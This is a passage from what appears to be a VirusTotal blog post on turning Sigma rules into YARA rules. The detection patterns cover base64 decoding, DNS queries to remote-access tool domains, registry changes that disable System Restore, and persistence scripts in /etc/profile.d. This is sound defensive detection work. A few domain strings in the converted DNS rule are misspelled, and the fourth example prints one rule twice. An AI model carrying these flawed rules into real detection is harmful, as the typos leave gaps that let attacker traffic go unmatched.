The new YARA editor is integrated with both <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> and <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b>, so basically will be our default editor for anything YARA-related in VirusTotal. The goal is making writing rules easier and faster, and finding everything you need, from templates to testing, in one place.
</div>
<div class="interval_12">
You may have noticed that the ITW feature is not included in the <b><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" target="_blank">official documentation</a></b>, and that it was not previously possible to perform this type of check. This is because it is part of our ongoing improvements to the "vt" module for YARA, which we will be introducing to you very soon.
</div>
<div class="interval_12">
We hope you find all these new features as useful as we do. If you have any questions or requests please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Don’t forget to stay tuned, <b>Netloc Hunting</b> is coming! And as always, happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-44350428338132885222023-06-26T14:34:00.004+02:002023-06-26T15:54:41.230+02:00Threat hunting converting SIGMA to YARA<p>
<span style="font-family: Arial;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;">Malware threat hunting is the process of proactively searching for malicious activity. It is a critical part of any organization's security posture, as it can help to identify and mitigate threats that may have otherwise gone undetected.</span>
</span>
</p>
<p>
<span style="font-family: Arial; font-size: 11pt; white-space-collapse: preserve;">Sigma rules and YARA rules are two powerful tools that can be used for detection and malware threat hunting. Sigma rules are a type of open rule language that</span>
<span style="font-family: Arial; font-size: 11pt; white-space-collapse: preserve;"> can be used to describe malicious activity. </span>
</p>
<span id="docs-internal-guid-561ba94e-7fff-67e2-f050-010893bccfd3">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Many sigma rules can be converted into yara rules for use with the </span><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">VT yara module</span>
</a><span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">to match data from our</span> <a href="https://support.virustotal.com/hc/en-us/articles/6253253596957-In-house-Sandboxes-behavioural-analysis-products" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">inhouse</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> and </span><a href="https://support.virustotal.com/hc/en-us/articles/7904672302877-External-behavioural-engines-sandboxes" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">external</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> sandboxes and behavioral engines. You can then use the VirusTotal</span>
<a href="https://support.virustotal.com/hc/en-us/articles/9175806754461-IOC-Stream-Threat-Feeds" style="text-decoration-line: none;">
<span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;"> IOC Stream</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">, to view the YARA matches on new file analysis. </span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Below are some examples of how to convert from <a href="https://github.com/SigmaHQ/sigma" target="_blank">SIGMA</a> to <a href="https://yara.readthedocs.io/" target="_blank">YARA</a>:</span>
</p>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="font-family: Arial; font-size: 16pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">Example 1: Matching processes</span>
</h2>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 10pt; margin-top: 0pt;">
<span face=""Google Sans Text", sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Consider Sigma rule to <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" target="_blank">detect base64 decode</a>. </span></p>
<pre>title: Decode Base64 Encoded Text -MacOs
id: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68
status: test
description: Detects usage of base64 utility to decode arbitrary base64-encoded text
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020/10/19
modified: 2022/11/26
tags:
- attack.defense_evasion
- attack.t1027
logsource:
category: process_creation
product: macos
detection:
selection:
Image: '/usr/bin/base64'
CommandLine|contains: '-d'
condition: selection
falsepositives:
- Legitimate activities
level: low
</pre>
<br />
<p>The sigma rule can be translated to a Yara rule similar to:</p>
<pre>import "vt"
rule base64decode
{
meta:
sigma_source = "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml"
example1 = "f3e5c20b34731d6611e1a49def1c89d5c180db9bb465f8471ba84c1ad16b90e5"
example2 = "ea502018cb3eeb56a930df29c7447857c6cca05d3431d2f575d2c62753bb81f1"
condition:
for any cmd in vt.behaviour.command_executions : (
cmd icontains "base64 " and cmd icontains " -d"
)
}
</pre>
<br />
<p>Remember to test your rule to ensure it matches the desired samples.</p>
<p>
<img src="https://lh5.googleusercontent.com/UZpBRN_VVoMPiLCIsODGQHif9UvaMzII4VG4873H6NhA-5sWb4RaMFx_zN6B3epGPKSNYLqQ7JLF3HQ0LyWWwDxnwZM4wthPo4A3Bt3bsmYBawSiBHEqKvITNm0kHrY0jHm93MX--Wwvq-T0v8JQduWuijYeETZLTW6TxGg-9dQOqXFR6-Kwz2jxb_fp2OQB9TZyvLyWXnoUcpfJh7cRCdKNVWqe9cJMGioA_Q" style="margin-left: 0px; margin-top: 0px;" width="624" />
</p>
<br />
<h2>Example 2: Matching DNS</h2>
<p>
In this example, we will generate YARA matches that produce similar results to the
<a href="https://www.virustotal.com/gui/intelligence-overview">VirusTotal Intelligence</a> query, with a <a href="https://support.virustotal.com/hc/en-us/articles/360001385897-File-search-modifiers">search modifier</a>.
<ul>
<li><a href="https://www.virustotal.com/gui/search/sigma_rule%253A%2522DNS%2520Query%2520To%2520Remote%2520Access%2520Software%2522/files" > sigma_rule:"DNS Query To Remote Access Software"</a>.
</li>
</ul>
<p>Sigma rule from <a href="https://github.com/SigmaHQ/sigma/blob/cda0fbff62ce7f818198701452f1e0820f257b62/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml#L4">SigmaHQ to dectect common remote access domains</a>:
</p>
<pre>title: DNS Query To Remote Access Software Domain
id: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52
related:
- id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f
type: obsoletes
- id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d
type: obsoletes
- id: ed785237-70fa-46f3-83b6-d264d1dc6eb4
type: obsoletes
status: experimental
description: |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution
- https://redcanary.com/blog/misbehaving-rats/
author: frack113, Connor Martin
date: 2022/07/11
modified: 2023/04/18
tags:
- attack.command_and_control
- attack.t1219
logsource:
product: windows
category: dns_query
detection:
selection:
QueryName|endswith:
- '.getgo.com'
- '.logmein.com'
- '.ammyy.com'
- '.netsupportsoftware.com' # For NetSupport Manager RAT
- 'remoteutilities.com' # Usage of Remote Utilities RAT
- '.net.anydesk.com'
- 'api.playanext.com'
- '.relay.splashtop.com'
- '.api.splashtop.com'
- 'app.atera.com'
- '.agentreporting.atera.com'
- '.pubsub.atera.com'
- 'logmeincdn.http.internapcdn.net'
- 'logmein-gateway.com'
- 'client.teamviewer.com'
</pre>
The above sigma signature can be expressed as a Yara rule:
<pre>import "vt"
rule dns_remote_access
{
meta:
sigma_src = "https://github.com/SigmaHQ/sigma/blob/c05f864047ffbe793299499c79ec52920062159f/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml#L4"
condition:
for any lookup in vt.behaviour.dns_lookups : (
for any host in (".getgo.com",".logmein.com",".ammyy.com",".netsupportsoftware.com","remoteutilities.com","net.anydesk.com","relay.splashtop.com","api.splashtop.com","app.atea.com","agentreporting.atera.com","pubsub.atera.com","http.internapcdn.ne","logmein-gateway.com","client.teamviewer.com") : (
lookup.hostname contains host
))
}
</pre>
<h2> Example 3: Matching registry keys set</h2>
In this example we will search registry keys set. Using VT Intelligence you can search for strings within registry keys or values with a query like:
<a href="https://www.virustotal.com/gui/search/behaviour_registry%253ASystemRestore%255CDisableConfig/files">behaviour_registry:SystemRestore\DisableConfig</a>"
<br />
Consider the sigma rule:
<pre>title: Registry Disable System Restore
id: 5de03871-5d46-4539-a82d-3aa992a69a83
status: experimental
description: Detects the modification of the registry to disable a system restore on the computer
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
author: frack113
date: 2022/04/04
modified: 2022/09/09
tags:
- attack.impact
- attack.t1490
logsource:
category: registry_set
product: windows
detection:
selection:
EventType: Setvalue
TargetObject|contains:
- '\Policies\Microsoft\Windows NT\SystemRestore'
- '\Microsoft\Windows NT\CurrentVersion\SystemRestore'
TargetObject|endswith:
- DisableConfig
- DisableSR
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unknown
level: high
</pre>
<br />
<p>The sigma rule as yara:</p>
<pre>import "vt"
rule disable_restore
{
meta:
sigma_source = "https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml#L2"
example1 = "08c2d3fec8cd9fcced634df7ad0f3db164ffe0cbfc263e2d8be026afca05bfcb"
condition:
for any reg in vt.behaviour.registry_keys_set : (
( reg.key contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore"
or reg.key contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore" )
and
(reg.key contains "DisableSR" or reg.key contains "DisableConfig")
and (reg.value contains "1")
)
}
</pre>
<br />
<p dir="ltr" style="line-height: 1.38; margin-bottom: 10pt; margin-top: 0pt;">
<span face=""Google Sans Text", sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Test your rule to ensure it matches desired samples:</span>
</p>
<p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkDdq_JyIK_s0MMrZoT-e44CbMlJCxhuH5f9uSzmryjRei147hF1ltETcKM7F-iu49nNEaO61V6xjxD1V-6_5tTRPihNYNs8CZH8YFTJwzoXuy7cPYtYDT3LQR7yTJRmrZ32lG0-71bWuP19dcA5vqh0YMXQ9345Ph2zln9O0sW30q9omXJoSBDvHGj0/s1111/reg_disable_restore.png" style="margin-left: 1em; margin-right: 1em;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkDdq_JyIK_s0MMrZoT-e44CbMlJCxhuH5f9uSzmryjRei147hF1ltETcKM7F-iu49nNEaO61V6xjxD1V-6_5tTRPihNYNs8CZH8YFTJwzoXuy7cPYtYDT3LQR7yTJRmrZ32lG0-71bWuP19dcA5vqh0YMXQ9345Ph2zln9O0sW30q9omXJoSBDvHGj0/s1111/reg_disable_restore.png" width="100%" /></a>
</p>
<br />
<h2>Example 4: Matching files on disk</h2>
<p>A sima rule from SigmaHQ to detect <a href="https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml"> linux samples modifying /etc/profile.d </a></p>
<pre>title: Potentially Suspicious Shell Script Creation in Profile Folder
id: 13f08f54-e705-4498-91fd-cce9d9cee9f1
status: experimental
description: Detects the creation of shell scripts under the "profile.d" path.
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023/06/02
tags:
- attack.persistence
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|contains: '/etc/profile.d/'
TargetFilename|endswith:
- '.csh'
- '.sh'
condition: selection
falsepositives:
- Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
- Regular file creation during system update or software installation by the package manager
level: low # Can be increased to a higher level after some tuning
</pre>
<p>
This could be searched with a VT intelligence query like:
<a href="https://www.virustotal.com/gui/search/behaviour_files%253A%2522%252Fetc%252Fprofile.d%252F%2522%2520and%2520(behaviour_files%253A%2522.sh%2522%2520or%2520behaviour_files%253A*.csh)%2520and%2520(tag%253Aelf%2520or%2520tag%253Ashell)/files" style="text-decoration-line: none;">
behaviour_files:"/etc/profile.d/" and (behaviour_files:".sh" or behaviour_files:*.csh) and (tag:elf or tag:shell)
</a>
</p>
<pre>import "vt"
rule suspicious_profile_folder
{
meta:
sigma_source = "https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml"
example_hash1 = "e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0"
example_hash2 = "447431333b2c2a72ac213a9fa2da8c2b09383ae75c3b31a88acfa79b8d43b8d8"
author = "author: Joseliyo Sanchez, @Joseliyo_Jstnk"
condition:
for any dropped in vt.behaviour.files_dropped : (
dropped.path contains "/etc/profile.d/"
and (dropped.path endswith ".sh" or dropped.path endswith ".csh")
)
or
for any file_path in vt.behaviour.files_written : (
file_path contains "/etc/profile.d/"
and (file_path endswith ".sh" or file_path endswith ".csh")
)
}
</pre>
<br />
<p>As yara:</p>
<pre>import "vt"
rule suspicious_profile_folder
{
meta:
sigma_source = "https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml"
example_hash1 = "e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0"
example_hash2 = "447431333b2c2a72ac213a9fa2da8c2b09383ae75c3b31a88acfa79b8d43b8d8"
author = "author: Joseliyo Sanchez, @Joseliyo_Jstnk"
condition:
for any dropped in vt.behaviour.files_dropped : (
dropped.path contains "/etc/profile.d/"
and (dropped.path endswith ".sh" or dropped.path endswith ".csh")
)
or
for any file_path in vt.behaviour.files_written : (
file_path contains "/etc/profile.d/"
and (file_path endswith ".sh" or file_path endswith ".csh")
)
}
</pre>
<br />
<br />
<h2>Summary of translating sigma to yara:</h2>
<p>
You may wish to review the
<a href="https://github.com/SigmaHQ/sigma-specification/" target="_blank">sigma specification</a>
and review the
<a href="https://support.virustotal.com/hc/en-us/articles/360015738658-Sigma-rules" target="_blank">
sigma rules detected on VirusTotal</a> for examples.
</p>
<p>Any data contained in the
<a href="https://developers.virustotal.com/reference/file-behaviour-summary" target="_blank">file behavior object</a>
can be matched on.
</p>
<p> The table below may help in guiding you to the correct keywords to use.</p>
<div align="center" dir="ltr" style="margin-left: 0pt;">
<table>
<thead>
<tr>
<th> Sigma Taxonomy</th>
<th> VirusTotal schema</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<ul>
<li>file_access
<ul>
<li>TargetFilename</li>
</ul>
</li>
<li>file_event
<ul>
<li>TargetFilename</li>
</ul>
</li>
<li>sysmon
<ul>
<li>EventID 11 (FileCreate)</li>
</ul>
</li></ul>
</td>
<td>
<ul>
<li>vt.behaviour.files_written[]</li>
<li>vt.behaviour.files_dropped[].path</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>registry_set</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.registry_keys_set[].key</li>
<li>vt.behaviour.registry_keys_set[].value</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>registry_delete</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.registry_keys_deleted[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>process_creation</li>
<li>ps_script</li>
<li>file_event
<ul>
<li>Image</li>
</ul>
</li></ul>
</td>
<td>
<ul>
<li>vt.behaviour.command_executions[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>network_connection
<ul>
<li>DestinationHostname</li>
</ul>
</li>
<li>dns_query
<ul>
<li>QueryName</li>
</ul>
</li>
<li>dns
<ul>
<li>query</li>
</ul>
</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.dns_lookups[].hostname</li>
<li>vt.behaviour.tls[].sni</li>
<li>vt.behaviour.memory_pattern_urls[]</li>
<li>vt.behaviour.memory_pattern_domains[]</li>
</ul>
</td>
</tr>
<tr>
<td>
<ul>
<li>file_delete</li>
</ul>
</td>
<td>
<ul>
<li>vt.behaviour.files_deleted[]</li>
</ul>
</td>
</tr>
</tbody>
</table>
</div>
<br />
<br />
<p dir="ltr">
Malware threat hunting can be complex, by using Sigma rules and YARA rules, you can make the process more efficient and effective. Happy hunting.
</p>
<br />
</span>
Karl Hiramotohttp://www.blogger.com/profile/11119982463034531786noreply@blogger.com0